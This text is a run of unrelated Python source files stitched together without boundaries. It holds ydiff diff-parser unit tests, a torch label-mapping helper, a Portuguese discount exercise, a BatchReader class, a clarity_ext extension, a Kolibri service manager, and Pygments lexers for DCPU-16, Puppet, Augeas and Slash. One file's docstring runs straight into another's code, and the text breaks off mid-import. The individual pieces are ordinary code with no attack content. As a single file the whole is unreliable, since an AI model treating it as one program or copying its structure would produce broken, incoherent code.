self.assertTrue(self.diff.is_hunk_meta('## -0,0 +1 ##')) self.assertTrue(self.diff.is_hunk_meta('## -0,0 +1 ##\n')) self.assertTrue(self.diff.is_hunk_meta('## -0,0 +1 ##\r\n')) def test_is_hunk_meta_neg(self): self.assertFalse(self.diff.is_hunk_meta('@@ -1 + @@')) self.assertFalse(self.diff.is_hunk_meta('@@ -this is not a hunk meta')) self.assertFalse(self.diff.is_hunk_meta('## -this is not either')) def test_parse_hunk_meta_normal(self): self.assertEqual(self.diff.parse_hunk_meta('@@ -3,7 +3,6 @@'), ((3, 7), (3, 6))) def test_parse_hunk_meta_missing(self): self.assertEqual(self.diff.parse_hunk_meta('@@ -3 +3,6 @@'), ((3, 1), (3, 6))) self.assertEqual(self.diff.parse_hunk_meta('@@ -3,7 +3 @@'), ((3, 7), (3, 1))) self.assertEqual(self.diff.parse_hunk_meta('@@ -3 +3 @@'), ((3, 1), (3, 1))) def test_parse_hunk_meta_svn_prop(self): self.assertEqual(self.diff.parse_hunk_meta('## -0,0 +1 ##'), ((0, 0), (1, 1))) def test_is_old(self): self.assertTrue(self.diff.is_old('-hello world')) self.assertTrue(self.diff.is_old('----')) # yaml def test_is_old_neg(self): self.assertFalse(self.diff.is_old('--- considered as old path')) self.assertFalse(self.diff.is_old('-' * 72)) # svn log --diff def test_is_new(self): self.assertTrue(self.diff.is_new('+hello world')) self.assertTrue(self.diff.is_new('++++hello world')) def test_is_new_neg(self): self.assertFalse(self.diff.is_new('+++ considered as new path')) class DiffParserTest(unittest.TestCase): def test_parse_invalid_hunk_meta(self): patch = """\ spam --- a +++ b spam @@ -a,a +0 @@ """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) self.assertRaises(RuntimeError, list, parser.get_diff_generator()) def test_parse_dangling_header(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common spam """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 2) self.assertEqual(len(out[1]._headers), 1) self.assertEqual(out[1]._headers[0], 'spam\n') self.assertEqual(out[1]._old_path, '') self.assertEqual(out[1]._new_path, '') self.assertEqual(len(out[1]._hunks), 0) def 
test_parse_missing_new_path(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common --- c """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) self.assertRaises(AssertionError, list, parser.get_diff_generator()) def test_parse_missing_hunk_meta(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common --- c +++ d """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 2) self.assertEqual(len(out[1]._headers), 0) self.assertEqual(out[1]._old_path, '--- c\n') self.assertEqual(out[1]._new_path, '+++ d\n') self.assertEqual(len(out[1]._hunks), 0) def test_parse_missing_hunk_list(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common --- c +++ d @@ -1,2 +1,2 @@ """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) self.assertRaises(AssertionError, list, parser.get_diff_generator()) def test_parse_only_in_dir(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common Only in foo: foo --- c +++ d @@ -1,2 +1,2 @@ -foo +bar common """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 3) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._headers, ['Only in foo: foo\n']) self.assertEqual(len(out[2]._hunks), 1) self.assertEqual(len(out[2]._hunks[0]._hunk_list), 3) def test_parse_only_in_dir_at_last(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common Only in foo: foo """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 2) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._headers, ['Only in foo: foo\n']) def test_parse_binary_differ_diff_ru(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common Binary files a/1.pdf and b/1.pdf differ --- c +++ d @@ -1,2 +1,2 @@ -foo +bar common """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 3) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._old_path, '') self.assertEqual(out[1]._new_path, '') self.assertEqual(len(out[1]._headers), 1) self.assertTrue(out[1]._headers[0].startswith('Binary files')) self.assertEqual(len(out[2]._hunks), 1) self.assertEqual(len(out[2]._hunks[0]._hunk_list), 3) def test_parse_binary_differ_git(self): patch = """\ diff --git a/foo b/foo index 529d8a3..ad71911 100755 --- a/foo +++ b/foo @@ -1,2 +1,2 @@ -foo +bar common diff --git a/example.pdf b/example.pdf index 1eacfd8..3696851 100644 Binary files a/example.pdf and b/example.pdf differ diff --git a/bar b/bar index 529e8a3..ad71921 100755 --- a/bar +++ b/bar @@ -1,2 +1,2 @@ -foo +bar common """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 3) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._old_path, '') self.assertEqual(out[1]._new_path, '') self.assertEqual(len(out[1]._headers), 3) self.assertTrue(out[1]._headers[2].startswith('Binary files')) self.assertEqual(len(out[2]._hunks), 1) 
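# out[2] is the third file in the patch ("bar"); it should still parse normally into a
# single hunk whose list holds the three lines (-foo, +bar, and the common line).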
self.assertEqual(len(out[2]._hunks[0]._hunk_list), 3) def test_parse_svn_prop(self): patch = """\ --- a +++ b Added: svn:executable ## -0,0 +1 ## +* \\ No newline at end of property Added: svn:keywords ## -0,0 +1 ## +Id """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 1) self.assertEqual(len(out[0]._hunks), 2) hunk = out[0]._hunks[1] self.assertEqual(hunk._hunk_headers, ['Added: svn:keywords\n']) self.assertEqual(hunk._hunk_list, [('+', 'Id\n')]) @unittest.skipIf(os.name == 'nt', 'Travis CI Windows not ready for shell cmds') class MainTest(unittest.TestCase): def setUp(self): self._cwd = os.getcwd() self._ws = tempfile.mkdtemp(prefix='test_ydiff') self._non_ws = tempfile.mkdtemp(prefix='test_ydiff') cmd = ('cd %s; git init; git config user.name me; ' 'git config user.email <EMAIL>') % self._ws subprocess.call(cmd, shell=True, stdout=subprocess.PIPE) self._change_file('init') def tearDown(self): os.chdir(self._cwd) cmd = ['/bin/rm', '-rf', self._ws, self._non_ws] subprocess.call(cmd) def _change_file(self, text): cmd = ['/bin/sh', '-c', 'cd %s; echo "%s" > foo' % (self._ws, text)] subprocess.call(cmd) def _commit_file(self): cmd = ['/bin/sh', '-c', 'cd %s; git add foo; git commit foo -m update' % self._ws] subprocess.call(cmd, stdout=subprocess.PIPE) def test_preset_options(self): os.environ['YDIFF_OPTIONS'] = '--help' self.assertRaises(SystemExit, ydiff.main) os.environ.pop('YDIFF_OPTIONS', None) def test_read_diff(self): sys.argv = sys.argv[:1] self._change_file('read_diff') os.chdir(self._ws) ret = ydiff.main() os.chdir(self._cwd) self.assertEqual(ret, 0) # Following 3 tests does not pass on Travis anymore due to tty problem def _test_read_log(self): sys.argv = [sys.argv[0], '--log'] self._change_file('read_log') self._commit_file() os.chdir(self._ws) ret = ydiff.main() os.chdir(self._cwd) self.assertEqual(ret, 0) def _test_read_diff_neg(self): sys.argv = sys.argv[:1] os.chdir(self._non_ws) ret = ydiff.main() os.chdir(self._cwd) self.assertNotEqual(ret, 0) def _test_read_log_neg(self): sys.argv = [sys.argv[0], '--log'] os.chdir(self._non_ws) ret = ydiff.main() os.chdir(self._cwd) self.assertNotEqual(ret, 0) if __name__ == '__main__': unittest.main() # vim:set et sts=4 sw=4 tw=80: import torch import numpy as np def createDictLabels(labels): """ Creates dictionaries that fits data with non-sequential labels into a sequential order label from [0...nClasses]. :param labels: all the non-sequential labels :return: dict that converts from non-sequential to sequential, dict that converts from sequential to non-sequential """ # Re-arange the Target vectors between [0..nClasses_train] labels = labels.numpy() unique_labels = np.unique(labels) dictLabels = {val: i for i, val in enumerate(unique_labels)} dictLabelsInverse = {i: val for i, val in enumerate(unique_labels)} return dictLabels,dictLabelsInverse def fitLabelsToRange(dictLabels,labels): """ Converts Tensor values to the values contained in the dictionary :param dictLabels: dictionary with the conversion values :param labels: Tensor to convert :return: Tensor with the converted labels. 
""" labels = labels.numpy() unique_labels = np.unique(labels) labels_temp = np.array(labels) for i in dictLabels.keys(): labels_temp[labels == i] = dictLabels[i] labels = labels_temp return torch.from_numpy(labels) def unflattenParams(model,flatParams): flatParams = flatParams.squeeze() indx = 0 for param in model.net.parameters(): lengthParam = param.view(-1).size()[0] param.data = flatParams[indx:indx+lengthParam].view_as(param).data indx = indx + lengthParam a = 0 <reponame>LeonardoPereirajr/Curso_em_video_Python preco = float(input('Qual o preço do produto ? : ')) desc = 0.05 novo = preco - (preco * 0.05) print(' O valor deste produto com desconto da loja é de R$ {}'.format(novo))""" pycraigslist.tests.test_unit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A suite of modules to unit test the pycraigslist module. """ from typing import Sized import numpy as np class BatchReader: def __init__(self, *data: Sized, batch_size: int = 32): """ Class that handles batch reading of data. It's an iterator that subsequently reads data Args: *data: sequence of data parts that should be read. The sizes of all data parts must be the same. batch_size: the size of the batch """ self.data = data data_parts_num = len(data) assert data_parts_num > 0 self.data_size = len(data[0]) assert data_parts_num < 1 or all( len(datum) == self.data_size for datum in data ), f"{[len(datum) for datum in data]}" self.batch_size = batch_size self.idx = 0 def __iter__(self): return self def __next__(self): if self.idx < self.data_size: cur_idx = self.idx self.idx += self.batch_size batch = [] for datum in self.data: batch.append(datum[cur_idx : cur_idx + self.batch_size]) return batch else: self.idx = 0 raise StopIteration def __len__(self): return np.math.ceil(self.data_size / self.batch_size) from clarity_ext.extensions import GeneralExtension class Extension(GeneralExtension): """ Make sure user has confirmed that a run was failed """ def execute(self): if self.context.current_step.udf_rtpcr_passed == "False": self.require_step_udf("Confirm failed run:") def require_step_udf(self, required_udf): udf_value = '' udf_exists = required_udf in self.context.current_step.udf_map.raw_map if udf_exists: udf_value = self.context.current_step.udf_map[required_udf].value if not udf_value == "Done": self.usage_error_defer("Please confirm that the run was failed: '{}'", required_udf) def integration_tests(self): yield self.test("24-39269", commit=False) <reponame>danigm/kolibri-installer-gnome import logging logger = logging.getLogger(__name__) import multiprocessing from ctypes import c_bool, c_char from .kolibri_service_main import KolibriServiceMainProcess from .kolibri_service_monitor import KolibriServiceMonitorProcess from .kolibri_service_setup import KolibriServiceSetupProcess from .kolibri_service_stop import KolibriServiceStopProcess class KolibriServiceContext(object): """ Common context passed to KolibriService processes. This includes events and shared values to facilitate communication. 
""" APP_KEY_LENGTH = 32 def __init__(self): self.__is_starting_value = multiprocessing.Value(c_bool) self.__is_starting_set_event = multiprocessing.Event() self.__is_stopped_value = multiprocessing.Value(c_bool) self.__is_stopped_set_event = multiprocessing.Event() self.__setup_result_value = multiprocessing.Value(c_bool) self.__setup_result_set_event = multiprocessing.Event() self.__is_responding_value = multiprocessing.Value(c_bool) self.__is_responding_set_event = multiprocessing.Event() self.__app_key_value = multiprocessing.Array(c_char, self.APP_KEY_LENGTH) self.__app_key_set_event = multiprocessing.Event() @property def is_starting(self): if self.__is_starting_set_event.is_set(): return self.__is_starting_value.value else: return None @is_starting.setter def is_starting(self, is_starting): self.__is_starting_value.value = is_starting if is_starting is None: self.__is_starting_set_event.clear() else: self.__is_starting_set_event.set() def await_is_starting(self): self.__is_starting_set_event.wait() return self.is_starting @property def is_stopped(self): if self.__is_stopped_set_event.is_set(): return self.__is_stopped_value.value else: return None @is_stopped.setter def is_stopped(self, is_stopped): self.__is_stopped_value.value = is_stopped if is_stopped is None: self.__is_stopped_set_event.clear() else: self.__is_stopped_set_event.set() def await_is_stopped(self): self.__is_stopped_set_event.wait() return self.is_stopped @property def setup_result(self): if self.__setup_result_set_event.is_set(): return self.__setup_result_value.value else: return None @setup_result.setter def setup_result(self, setup_result): self.__setup_result_value.value = setup_result if setup_result is None: self.__setup_result_set_event.clear() else: self.__setup_result_set_event.set() def await_setup_result(self): self.__setup_result_set_event.wait() return self.setup_result @property def is_responding(self): if self.__is_responding_set_event.is_set(): return self.__is_responding_value.value else: return None @is_responding.setter def is_responding(self, is_responding): self.__is_responding_value.value = is_responding if is_responding is None: self.__is_responding_set_event.clear() else: self.__is_responding_set_event.set() def await_is_responding(self): self.__is_responding_set_event.wait() return self.is_responding @property def app_key(self): if self.__app_key_set_event.is_set(): return self.__app_key_value.value.decode("ascii") else: return None @app_key.setter def app_key(self, app_key): self.__app_key_value.value = bytes(app_key, encoding="ascii") if app_key is None: self.__app_key_set_event.clear() else: self.__app_key_set_event.set() def await_app_key(self): self.__app_key_set_event.wait() return self.app_key class KolibriServiceManager(KolibriServiceContext): """ Manages the Kolibri service, starting and stopping it in separate processes, and checking for availability. 
""" APP_INITIALIZE_URL = "/app/api/initialize/{key}" def __init__(self): super().__init__() self.__main_process = KolibriServiceMainProcess(self) self.__monitor_process = KolibriServiceMonitorProcess(self) self.__setup_process = KolibriServiceSetupProcess(self) self.__stop_process = KolibriServiceStopProcess(self) def get_initialize_url(self, next_url=None): from ..kolibri_globals import KOLIBRI_BASE_URL app_key = self.await_app_key() url = self.APP_INITIALIZE_URL.format(key=app_key) if next_url: url += "?next={next_url}".format(next_url=next_url) return KOLIBRI_BASE_URL + url.lstrip("/") def get_kolibri_url(self, **kwargs): from urllib.parse import urljoin from urllib.parse import urlsplit from urllib.parse import urlunsplit from ..kolibri_globals import KOLIBRI_BASE_URL base_url = urlsplit(KOLIBRI_BASE_URL) if "path" in kwargs: kwargs["path"] = urljoin(base_url.path, kwargs["path"].lstrip("/")) target_url = base_url._replace(**kwargs) return urlunsplit(target_url) def is_kolibri_app_url(self, url): from ..kolibri_globals import KOLIBRI_BASE_URL if not url: return False elif not url.startswith(KOLIBRI_BASE_URL): return False elif url.startswith(KOLIBRI_BASE_URL + "static/"): return False elif url.startswith(KOLIBRI_BASE_URL + "downloadcontent/"): return False elif url.startswith(KOLIBRI_BASE_URL + "content/storage/"): return False else: return True def join(self): if self.__main_process.is_alive(): self.__main_process.join() if self.__monitor_process.is_alive(): self.__monitor_process.join() if self.__setup_process.is_alive(): self.__setup_process.join() if self.__stop_process.is_alive(): self.__stop_process.join() def start_kolibri(self): self.__setup_process.start() self.__main_process.start() self.__monitor_process.start() def stop_kolibri(self): self.__stop_process.start() <reponame>tony/django-docutils """ Based on custom lexers for GitHub.com :copyright: Copyright 2012 by GitHub, Inc :license: BSD, see LICENSE for details. """ from pygments.lexer import ( DelegatingLexer, ExtendedRegexLexer, RegexLexer, bygroups, include, ) from pygments.token import ( Comment, Keyword, Literal, Name, Number, Operator, Other, Punctuation, String, Text, Whitespace, ) __all__ = ['Dasm16Lexer', 'PuppetLexer', 'AugeasLexer', 'SlashLexer'] class Dasm16Lexer(RegexLexer): """ Simple lexer for DCPU-16 Assembly Check http://0x10c.com/doc/dcpu-16.txt """ name = 'dasm16' aliases = ['DASM16'] filenames = ['*.dasm16', '*.dasm'] mimetypes = ['text/x-dasm16'] INSTRUCTIONS = [ 'SET', 'ADD', 'SUB', 'MUL', 'MLI', 'DIV', 'DVI', 'MOD', 'MDI', 'AND', 'BOR', 'XOR', 'SHR', 'ASR', 'SHL', 'IFB', 'IFC', 'IFE', 'IFN', 'IFG', 'IFA', 'IFL', 'IFU', 'ADX', 'SBX', 'STI', 'STD', 'JSR', 'INT', 'IAG', 'IAS', 'RFI', 'IAQ', 'HWN', 'HWQ', 'HWI', ] REGISTERS = [ 'A', 'B', 'C', 'X', 'Y', 'Z', 'I', 'J', 'SP', 'PC', 'EX', 'POP', 'PEEK', 'PUSH', ] # Regexes yo char = r'[a-zA-Z$._0-9@]' identifier = r'(?:[a-zA-Z$_]' + char + r'*|\.' + char + '+)' number = r'[+-]?(?:0[xX][a-zA-Z0-9]+|\d+)' binary_number = r'0b[01_]+' instruction = r'(?i)(' + '|'.join(INSTRUCTIONS) + ')' single_char = r"'\\?" + char + "'" string = r'"(\\"|[^"])*"' def guess_identifier(lexer, match): ident = match.group(0) klass = Name.Variable if ident.upper() in lexer.REGISTERS else Name.Label yield match.start(), klass, ident tokens = { 'root': [ include('whitespace'), (':' + identifier, Name.Label), (identifier + ':', Name.Label), (instruction, Name.Function, 'instruction-args'), (r'\.' 
+ identifier, Name.Function, 'data-args'), (r'[\r\n]+', Text), ], 'numeric': [ (binary_number, Number.Integer), (number, Number.Integer), (single_char, String), ], 'arg': [(identifier, guess_identifier), include('numeric')], 'deref': [ (r'\+', Punctuation), (r'\]', Punctuation, '#pop'), include('arg'), include('whitespace'), ], 'instruction-line': [ (r'[\r\n]+', Text, '#pop'), (r';.*?$', Comment, '#pop'), include('whitespace'), ], 'instruction-args': [ (r',', Punctuation), (r'\[', Punctuation, 'deref'), include('arg'), include('instruction-line'), ], 'data-args': [ (r',', Punctuation), include('numeric'), (string, String), include('instruction-line'), ], 'whitespace': [(r'\n', Text), (r'\s+', Text), (r';.*?\n', Comment)], } class PuppetLexer(RegexLexer): name = 'Puppet' aliases = ['puppet'] filenames = ['*.pp'] tokens = { 'root': [include('puppet')], 'puppet': [ include('comments'), ( r'(class)(\s*)(\{)', bygroups(Name.Class, Text, Punctuation), ('type', 'namevar'), ), (r'(class|define)', Keyword.Declaration, ('block', 'class_name')), (r'node', Keyword.Declaration, ('block', 'node_name')), (r'elsif', Keyword.Reserved, ('block', 'conditional')), (r'if', Keyword.Reserved, ('block', 'conditional')), (r'unless', Keyword.Reserved, ('block', 'conditional')), ( r'(else)(\s*)(\{)', bygroups(Keyword.Reserved, Text, Punctuation), 'block', ), (r'case', Keyword.Reserved, ('case', 'conditional')), ( r'(::)?([A-Z][\w:]+)+(\s*)(<{1,2}\|)', bygroups(Name.Class, Name.Class, Text, Punctuation), 'spaceinvader', ), ( r'(::)?([A-Z][\w:]+)+(\s*)(\{)', bygroups(Name.Class, Name.Class, Text, Punctuation), 'type', ), ( r'(::)?([A-Z][\w:]+)+(\s*)(\[)', bygroups(Name.Class, Name.Class, Text, Punctuation), ('type', 'override_name'), ), ( r'(@{0,2}[\w:]+)(\s*)(\{)(\s*)', bygroups(Name.Class, Text, Punctuation, Text), ('type', 'namevar'), ), (r'\$(::)?(\w+::)*\w+', Name.Variable, 'var_assign'), (r'(include|require)', Keyword.Namespace, 'include'), (r'import', Keyword.Namespace, 'import'), (r'(\w+)(\()', bygroups(Name.Function, Punctuation), 'function'), (r'\s', Text), ], 'block': [include('puppet'), (r'\}', Text, '#pop')], 'override_name': [ include('strings'), include('variables'), (r'\]', Punctuation), (r'\s', Text), (r'\{', Punctuation, '#pop'), ], 'node_name': [ (r'inherits', Keyword.Declaration), (r'[\w\.]+', String), include('strings'), include('variables'), (r',', Punctuation), (r'\s', Text), (r'\{', Punctuation, '#pop'), ], 'class_name': [ (r'inherits', Keyword.Declaration), (r'[\w:]+', Name.Class), (r'\s', Text), (r'\{', Punctuation, '#pop'), (r'\(', Punctuation, 'paramlist'), ], 'include': [ (r'\n', Text, '#pop'), (r'[\w:-]+', Name.Class), include('value'), (r'\s', Text), ], 'import': [ (r'\n', Text, '#pop'), (r'[\/\w\.]+', String), include('value'), (r'\s', Text), ], 'case': [ ( r'(default)(:)(\s*)(\{)', bygroups(Keyword.Reserved, Punctuation, Text, Punctuation), 'block', ), include('case_values'), (r'(:)(\s*)(\{)', bygroups(Punctuation, Text, Punctuation), 'block'), (r'\s', Text), (r'\}', Punctuation, '#pop'), ], 'case_values': [include('value'), (r',', Punctuation)], 'comments': [(r'\s*#.*\n', Comment.Singleline)], 'strings': [ (r"'.*?'", String.Single), (r'\w+', String.Symbol), (r'"', String.Double, 'dblstring'), (r'\/.+?\/', String.Regex), ], 'dblstring': [ (r'\$\{.+?\}', String.Interpol), ( r'(?:\\(?:[bdefnrstv\'"\$\\/]|[0-7][0-7]?[0-7]?|\^[a-zA-Z]))', String.Escape, ), (r'[^"\\\$]+', String.Double), (r'\$', String.Double), (r'"', String.Double, '#pop'), ], 'variables': [(r'\$(::)?(\w+::)*\w+', 
Name.Variable)], 'var_assign': [ (r'\[', Punctuation, ('#pop', 'array')), (r'\{', Punctuation, ('#pop', 'hash')), (r'(\s*)(=)(\s*)', bygroups(Text, Operator, Text)), (r'(\(|\))', Punctuation), include('operators'), include('value'), (r'\s', Text, '#pop'), ], 'booleans': [(r'(true|false)', Literal)], 'operators': [ ( r'(\s*)(==|=~|\*|-|\+|<<|>>|!=|!~|!|>=|<=|<|>|and|or|in)(\s*)', bygroups(Text, Operator, Text), ) ], 'conditional': [ include('operators'), include('strings'), include('variables'), (r'\[', Punctuation, 'array'), (r'\(', Punctuation, 'conditional'), (r'\{', Punctuation, '#pop'), (r'\)', Punctuation, '#pop'), (r'\s', Text), ], 'spaceinvader': [ include('operators'), include('strings'), include('variables'), (r'\[', Punctuation, 'array'), (r'\(', Punctuation, 'conditional'), (r'\s', Text), (r'\|>{1,2}', Punctuation, '#pop'), ], 'namevar': [ include('value'), (r'\[', Punctuation, 'array'), (r'\s', Text), (r':', Punctuation, '#pop'), (r'\}', Punctuation, '#pop'), ], 'function': [ (r'\[', Punctuation, 'array'), include('value'), (r',', Punctuation), (r'\s', Text), (r'\)', Punctuation, '#pop'), ], 'paramlist': [ include('value'), (r'=', Punctuation), (r',', Punctuation), (r'\s', Text), (r'\[', Punctuation, 'array'), (r'\)', Punctuation, '#pop'), ], 'type': [ ( r'(\w+)(\s*)(=>)(\s*)', bygroups(Name.Tag, Text, Punctuation, Text), 'param_value', ), (r'\}', Punctuation, '#pop'), (r'\s', Text), include('comments'), (r'', Text, 'namevar'), ], 'value': [ (r'[\d\.]', Number), (r'([A-Z][\w:]+)+(\[)', bygroups(Name.Class, Punctuation), 'array'), (r'(\w+)(\()', bygroups(Name.Function, Punctuation), 'function'), include('strings'), include('variables'), include('comments'), include('booleans'), ( r'(\s*)(\?)(\s*)(\{)', bygroups(Text, Punctuation, Text, Punctuation), 'selector', ), (r'\{', Punctuation, 'hash'), ], 'selector': [ (r'default', Keyword.Reserved), include('value'), (r'=>', Punctuation), (r',', Punctuation), (r'\s', Text), (r'\}', Punctuation, '#pop'), ], 'param_value': [ include('value'), (r'\[', Punctuation, 'array'), (r',', Punctuation, '#pop'), (r';', Punctuation, '#pop'), (r'\s', Text, '#pop'), (r'', Text, '#pop'), ], 'array': [ include('value'), (r'\[', Punctuation, 'array'), (r',', Punctuation), (r'\s', Text), (r'\]', Punctuation, '#pop'), ], 'hash': [ include('value'), (r'\s', Text), (r'=>', Punctuation), (r',', Punctuation), (r'\}', Punctuation, '#pop'), ], } class AugeasLexer(RegexLexer): name = 'Augeas' aliases = ['augeas'] filenames = ['*.aug'] tokens = { 'root': [ ( r'(module)(\s*)([^\s=]+)', bygroups(Keyword.Namespace, Text, Name.Namespace), ), ( r'(let)(\s*)([^\s=]+)', bygroups(Keyword.Declaration, Text, Name.Variable), ), ( r'(del|store|value|counter|seq|key|label|autoload|incl|' r'excl|transform|test|get|put)(\s+)', bygroups(Name.Builtin, Text), ), ( r'(\()([^\:]+)(\:)(unit|string|regexp|lens|tree|filter)(\))', bygroups( Punctuation, Name.Variable, Punctuation, Keyword.Type, Punctuation ), ), (r'\(\*', Comment.Multiline, 'comment'), (r'[\+=\|\.\*\;\?-]', Operator), (r'[\[\]\(\)\{\}]', Operator), (r'"', String.Double, 'string'), (r'\/', String.Regex, 'regex'), ( r'([A-Z]\w*)(\.)(\w+)', bygroups(Name.Namespace, Punctuation, Name.Variable), ), (r'.', Name.Variable), (r'\s', Text), ], 'string': [ (r'\\.', String.Escape), (r'[^"]', String.Double), (r'"', String.Double, '#pop'), ], 'regex': [ (r'\\.', String.Escape), (r'[^\/]', String.Regex), (r'\/', String.Regex, '#pop'), ], 'comment': [ (r'[^*\)]', Comment.Multiline), (r'\(\*', Comment.Multiline, '#push'), (r'\*\)', 
Comment.Multiline, '#pop'), (r'[\*\)]', Comment.Multiline), ], } class SlashLanguageLexer(ExtendedRegexLexer): _nkw = r'(?=[^a-zA-Z_0-9])' def move_state(new_state): return ('#pop', new_state) def right_angle_bracket(lexer, match, ctx): if len(ctx.stack) > 1 and ctx.stack[-2] == 'string': ctx.stack.pop() yield match.start(), String.Interpol, '}' ctx.pos = match.end() tokens = { 'root': [ (r'<%=', Comment.Preproc, move_state('slash')), (r'<%!!', Comment.Preproc, move_state('slash')), (r'<%#.*?%>', Comment.Multiline), (r'<%', Comment.Preproc, move_state('slash')), (r'.|\n', Other), ], 'string': [ (r'\\', String.Escape, move_state('string_e')), (r'\'', String, move_state('slash')), (r'#\{', String.Interpol, 'slash'), (r'.|\n', String), ], 'string_e': [ (r'n', String.Escape, move_state('string')), (r't', String.Escape, move_state('string')), (r'r', String.Escape, move_state('string')), (r'e', String.Escape, move_state('string')), (r'x[a-fA-F0-9]{2}', String.Escape, move_state('string')), (r'.', String.Escape, move_state('string')), ], 'regexp': [ (r'}[a-z]*', String.Regex, move_state('slash')), (r'\\(.|\n)', String.Regex), (r'{', String.Regex, 'regexp_r'), (r'.|\n', String.Regex), ], 'regexp_r': [ (r'}[a-z]*', String.Regex, '#pop'), (r'\\(.|\n)', String.Regex), (r'{', String.Regex, 'regexp_r'), ], 'slash': [ (r'%>', Comment.Preproc, move_state('root')), (r'\'', String, move_state('string')), (r"'[a-zA-Z0-9_]+", String), (r'%r{', String.Regex, move_state('regexp')), (r'/\*.*?\*/', Comment.Multiline), (r'(#|//).*?\n', Comment.Single), (r'-?[0-9]+e[+-]?[0-9]+', Number.Float), (r'-?[0-9]+\.[0-9]+(e[+-]?[0-9]+)?', Number.Float), (r'-?[0-9]+', Number.Integer), (r'nil' + _nkw, Name.Builtin), (r'true' + _nkw, Name.Builtin), (r'false' + _nkw, Name.Builtin), (r'self' + _nkw, Name.Builtin), ( r'(class)(\s+)([A-Z][a-zA-Z0-9_\']*)', bygroups(Keyword, Whitespace, Name.Class), ), (r'class' + _nkw, Keyword), (r'extends' + _nkw, Keyword), ( r'(def)(\s+)(self)(\s*)(\.)(\s*)([a-z_][a-zA-Z0-9_\']*=?|<<|>>|' r'==|<=>|<=|<|>=|>|\+|-(self)?|~(self)?|\*|/|%|^|&&|&|\||\[\]=?)', bygroups( Keyword, Whitespace, Name.Builtin, Whitespace, Punctuation, Whitespace, Name.Function, ), ), ( r'(def)(\s+)([a-z_][a-zA-Z0-9_\']*=?|<<|>>|==|<=>|<=|<|>=|>|\+|' r'-(self)?|~(self)?|\*|/|%|^|&&|&|\||\[\]=?)', bygroups(Keyword, Whitespace, Name.Function), ), (r'def' + _nkw, Keyword), (r'if' + _nkw, Keyword), (r'elsif' + _nkw, Keyword), (r'else' + _nkw, Keyword), (r'unless' + _nkw, Keyword), (r'for' + _nkw, Keyword), (r'in' + _nkw, Keyword), (r'while' + _nkw, Keyword), (r'until' + _nkw, Keyword), (r'and' + _nkw, Keyword), (r'or' + _nkw, Keyword), (r'not' + _nkw, Keyword), (r'lambda' + _nkw, Keyword), (r'try' + _nkw, Keyword), (r'catch' + _nkw, Keyword), (r'return' + _nkw, Keyword), (r'next' + _nkw, Keyword), (r'last' + _nkw, Keyword), (r'throw' + _nkw, Keyword), (r'use' + _nkw, Keyword), (r'switch' + _nkw, Keyword), (r'\\', Keyword), (r'λ', Keyword), (r'__FILE__' + _nkw, Name.Builtin.Pseudo), (r'__LINE__' + _nkw, Name.Builtin.Pseudo), (r'[A-Z][a-zA-Z0-9_\']*' + _nkw, Name.Constant), (r'[a-z_][a-zA-Z0-9_\']*' + _nkw, Name), (r'@[a-z_][a-zA-Z0-9_\']*' + _nkw, Name.Variable.Instance), (r'@@[a-z_][a-zA-Z0-9_\']*' + _nkw, Name.Variable.Class), (r'\(', Punctuation), (r'\)', Punctuation), (r'\[', Punctuation), (r'\]', Punctuation), (r'\{', Punctuation), (r'\}', right_angle_bracket), (r';', Punctuation), (r',', Punctuation), (r'<<=', Operator), (r'>>=', Operator), (r'<<', Operator), (r'>>', Operator), (r'==', Operator), (r'!=', Operator), (r'=>', 
Operator), (r'=', Operator), (r'<=>', Operator), (r'<=', Operator), (r'>=', Operator), (r'<', Operator), (r'>', Operator), (r'\+\+', Operator), (r'\+=', Operator), (r'-=', Operator), (r'\*\*=', Operator), (r'\*=', Operator), (r'\*\*', Operator), (r'\*', Operator), (r'/=', Operator), (r'\+', Operator), (r'-', Operator), (r'/', Operator), (r'%=', Operator), (r'%', Operator), (r'^=', Operator), (r'&&=', Operator), (r'&=', Operator), (r'&&', Operator), (r'&', Operator), (r'\|\|=', Operator), (r'\|=', Operator), (r'\|\|', Operator), (r'\|', Operator), (r'!', Operator), (r'\.\.\.', Operator), (r'\.\.', Operator), (r'\.', Operator), (r'::', Operator), (r':', Operator), (r'(\s|\n)+', Whitespace), (r'[a-z_][a-zA-Z0-9_\']*', Name.Variable), ], } class SlashLexer(DelegatingLexer): """ Lexer for the Slash programming language. """ name = 'Slash' aliases = ['slash'] filenames = ['*.sl'] def __init__(self, **options): from pygments.lexers.web import 